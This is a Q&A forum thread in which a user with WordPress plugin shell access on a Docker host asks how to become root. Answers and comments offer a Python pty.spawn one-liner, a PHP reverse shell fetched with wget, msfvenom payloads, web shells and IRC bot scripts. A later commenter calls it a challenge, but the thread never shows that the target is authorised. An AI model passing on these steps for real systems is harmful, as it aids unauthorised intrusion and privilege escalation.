3

I have access to a Wordpress blog and want to read the server's /root directory that belongs to the user "root" and not "www-data". I also know his password, but I can't open an interactive shell to be even asked about that bit of information..

Well, I have downloaded the plugin WPTerm, with which I can call python scripts or write php files to be executed in the front end, but I run into trouble due to the following issues:

sudo is not available: sh: 1: sudo: not found su does not work: su: must be run from a terminal ssh and nc are also not available

It seems that this webserver runs in a docker environment and the Loginizer plugin tells me, that the server has the private IP Address: Server's IP Address 172.18.0.6

How the hell do I spawn an interactive shell where I can bypass the "su: must be run from a terminal" error message? I seriously have no idea what to do next, maybe some kind of shellcode for php or python would work.

Improve this question
3
  • A note on the lack of nc, have you also checked for ncat and netcat as commands? And what happens if you run commands using sh -c "command"? Commented Mar 28, 2018 at 0:28
  • Why not use script to give the password to su? Commented Mar 31, 2018 at 5:52
  • Try uploading the PHP reverse shell from Pentest Monkey's:pentestmonkey.net/tools/web-shells/php-reverse-shell (you could try to use: exec('wget <url>'); Commented Aug 30, 2019 at 7:31

2 Answers 2

Reset to default
1

Basically, you can try by starting a PTY shell:

echo "import pty; pty.spawn('/bin/bash')" > /tmp/abcd.py python /tmp/abcd.py

After that, you could install sudo (but I think that it's not necessary because after su -, you are a root user) with:

su - apt-get install sudo
Improve this answer
5
  • Yeah but WPTerm is a non-interactive shell, which means that after I run the python command the application basically freezes. That's why I need a one-liner to start a shell with superuser rights and read the contents of the /root directory or change its owner/access rights. Commented Mar 25, 2018 at 15:39
  • 3
    Did you try a reverse shell (i.e. upload it as PHP script) and after that connect to it by using netcat? Commented Mar 25, 2018 at 15:41
  • @CipherX suggestion seems the most logical. I would however, use a meterpreter shell rather than netcat -- use msfvenom to generate the php. Commented Mar 26, 2018 at 6:08
  • 1
    Look up 'the reverse shell cheat sheet' it's a good reference. I also concur with using venom to craft a payload Commented Jun 24, 2018 at 11:43
  • I did this challenge too and the answer @CipherX gave in the comments is correct. The solution was to use a reverse shell. Commented Jul 1, 2018 at 16:56
0

You could try to install bad scripts (viruses) after reading and adapt them:

  • PHP Shell PHP Shell or p0wny@shell

    A webpage presenting a FORM with a lot of features, including command line.

  • Perl IRC Bot Warr1024/logbot.pl or tlongren/bot.pl

    For this, a IRC server may be usefull. Read carefully the script and change IRC server, user and password...

Be carefull, playing with this kind of tools! Ensure you clearly understand what you do!

Improve this answer
1
  • And have the proper (real world) permission to do so. Commented Jul 31, 2018 at 19:50

You must log in to answer this question.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.